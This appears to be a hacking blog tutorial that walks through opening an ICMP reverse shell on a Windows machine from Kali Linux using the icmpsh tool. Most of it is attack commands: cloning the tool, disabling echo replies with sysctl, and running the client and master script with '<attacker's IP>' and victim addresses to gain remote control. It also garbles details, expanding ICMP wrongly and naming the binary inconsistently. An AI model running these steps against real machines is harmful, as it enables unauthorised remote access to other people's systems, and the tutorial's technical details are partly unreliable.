Introduction:
In case if you have not read our previous article about the reverse shell, CLICK-HERE
in my previous article, I didn’t tell you about ICMP reverse shell.
well, we will hack Windows with our Kali Linux. so we will use a tool here named icmpsh.
it opens a reverse shell with ICMP protocol. ICMP means internet message control protocol. ICMP is quite dense to explore that’s why I am not telling about everything here, you can google yourself. basically ICMP protocol has its own packets which are different from TCP/UDP. previously what we used were TCP packets to start a reverse shell. but here, we are using ICMP.
ATTACK & INSTALLATION
first you need to download the tool to your system from GitHub. type this command to download:
git clone https://github.com/inquisb/icmpsh.git
now go to the downloaded folder.
you will find some scripts there. it is written in different languages. we will use the python script – icmpsh_m.py
now we will need the windows machine IP address and our kali’s IP address(local).
so type this command to know your local IP in Kali Linux:
ifconfig
and type this to know your IP in windows:
ipconfig
before running the python script we will type this command in our kali:
sysctl -w net.ipv4.icmp_echo_ignore_all=1
it won’t let the ping reply automatically. like, the ping command won’t think that it is our local IP, so let’s just reply it.
now go to windows and paste the icmpsh.exe there and run it with command prompt:
icmp.exe -t <attacker's IP>
now we will run the script :
python icmpsh_m.py <attacker's IP> <vicitim's IP>
after it, you will gain a shell and you will have control on windows in limited privileges.
by the way, there is a technique that allows us to tunnel a connection with ICMP protocol. it is like SSH tunneling. if you haven’t read yet please CLICK-HERE
and if you want a tutorial on ICMP tunneling, comment to us.
Thanks For Visiting.